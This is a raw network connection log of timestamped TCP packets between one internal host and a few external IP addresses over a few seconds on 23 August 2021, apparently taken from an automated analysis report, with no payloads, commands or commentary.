Aug 23, 2021 02:08:39.764595985 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.764609098 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.765497923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.765595913 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.765714884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.765743017 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.765955925 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.765980005 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766009092 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.766038895 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.766113043 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766141891 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766213894 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766347885 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766376019 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766448975 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766470909 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766606092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766629934 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766678095 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766704082 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766757965 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766779900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766841888 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766901970 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766935110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.766957998 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767028093 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767081976 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767103910 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767231941 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767256975 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767309904 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767337084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767388105 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767411947 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767436981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767482042 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767502069 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767544031 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767566919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767587900 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767632008 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767653942 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767674923 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767733097 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767755032 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767801046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767822981 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767868996 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767890930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767911911 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767919064 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767945051 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767947912 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767951012 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767954111 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767956972 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767959118 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767961979 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767967939 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767968893 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767971039 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767973900 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767980099 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767982960 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767988920 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767991066 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.767992020 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767995119 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767997026 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.767999887 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768002987 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768006086 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768007994 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768011093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768013954 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768013954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768034935 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768057108 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768078089 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768102884 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768116951 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768121004 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768125057 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768146038 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768147945 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768167973 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768187046 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768191099 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768212080 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768232107 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768232107 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768253088 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768271923 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768276930 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768299103 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768316984 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768320084 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768342018 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768362045 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768362999 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768383026 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768400908 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768404007 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768424988 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768443108 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768449068 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768471003 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768491030 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768492937 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768515110 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768546104 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768549919 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768572092 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768593073 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768615961 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768655062 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768659115 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.768840075 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.768883944 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.769088984 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.769131899 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.769153118 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.769174099 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.769176006 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.769223928 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.883110046 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.883254051 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.914256096 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.914283037 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.914336920 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.914359093 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:39.945436954 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:39.945527077 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:40.117810965 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:41.967444897 CEST	49737	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:42.238749981 CEST	80	49737	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:42.238945961 CEST	49737	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:42.239111900 CEST	49737	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:42.239144087 CEST	49737	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:42.510186911 CEST	80	49737	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:43.103382111 CEST	80	49737	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:43.103415012 CEST	80	49737	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:43.103552103 CEST	49737	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:43.113604069 CEST	49737	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:43.167681932 CEST	49738	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:43.385365963 CEST	80	49737	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:43.457600117 CEST	80	49738	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:43.457726002 CEST	49738	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:43.457860947 CEST	49738	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:43.457894087 CEST	49738	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:43.747807980 CEST	80	49738	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:44.527888060 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:44.530920029 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:44.531686068 CEST	49735	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:44.562489986 CEST	80	49735	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:44.681729078 CEST	80	49738	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:44.681747913 CEST	80	49738	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:44.681853056 CEST	49738	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:44.684928894 CEST	49738	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:44.730178118 CEST	49739	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:44.975572109 CEST	80	49738	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:45.039181948 CEST	80	49739	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:45.039292097 CEST	49739	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:45.046821117 CEST	49739	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:45.048692942 CEST	49739	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:45.357378960 CEST	80	49739	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:45.790724039 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:45.848824024 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:45.890892982 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:45.948225021 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:45.990391016 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:46.161474943 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:46.218203068 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:46.218238115 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:46.219785929 CEST	8678	49731	185.215.113.29	192.168.2.3
Aug 23, 2021 02:08:46.271601915 CEST	49731	8678	192.168.2.3	185.215.113.29
Aug 23, 2021 02:08:46.300853968 CEST	80	49739	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:46.300878048 CEST	80	49739	222.236.49.124	192.168.2.3
Aug 23, 2021 02:08:46.301065922 CEST	49739	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:46.301100969 CEST	49739	80	192.168.2.3	222.236.49.124
Aug 23, 2021 02:08:46.315272093 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.347141981 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.347729921 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.348644018 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.380335093 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381542921 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381576061 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381601095 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381627083 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381689072 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381690025 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.381715059 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381727934 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.381737947 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381759882 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381767988 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.381786108 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381805897 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.381809950 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.381869078 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.413199902 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413232088 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413254023 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413275003 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413295984 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413311958 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413364887 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413383961 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.413388014 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413408995 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413429022 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413460970 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.413467884 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413499117 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.413502932 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413527966 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413544893 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.413563967 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413584948 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413606882 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413644075 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.413650036 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413674116 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.413682938 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413734913 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413764000 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.413781881 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.413805962 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.445147991 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445233107 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445267916 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445298910 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445329905 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445358992 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445389032 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445419073 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445451021 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445482969 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445513010 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445543051 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445585966 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445615053 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445643902 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445673943 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445703983 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445734024 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445765972 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445797920 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.445805073 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445837975 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445857048 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.445868969 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445908070 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.445909023 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.445924997 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.445940971 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446014881 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.446026087 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446060896 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446094036 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446116924 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446134090 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446156025 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446157932 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.446176052 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446194887 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.446196079 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446216106 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446240902 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446242094 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.446261883 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446281910 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446301937 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.446304083 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446305037 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.446326017 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446342945 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.446346045 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446371078 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.446409941 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.446441889 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.479578972 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.479707003 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.479749918 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.479785919 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.479823112 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.479826927 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.479851961 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.479861021 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.479938984 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.479969978 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.479994059 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480021000 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480042934 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480067015 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480046988 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480092049 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480094910 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480129004 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480151892 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480154037 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480176926 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480205059 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480228901 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480247021 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480273008 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480289936 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480299950 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480324030 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480326891 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480353117 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480376959 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480400085 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480403900 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480423927 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480448961 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480448961 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480473995 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480474949 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480501890 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480540991 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480542898 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480568886 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480592966 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480597019 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480623007 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480643034 CEST	49740	80	192.168.2.3	193.142.59.123
Aug 23, 2021 02:08:46.480648041 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480674028 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480696917 CEST	80	49740	193.142.59.123	192.168.2.3
Aug 23, 2021 02:08:46.480719090 CEST	49740	80	192.168.2.3	193.142.59.123
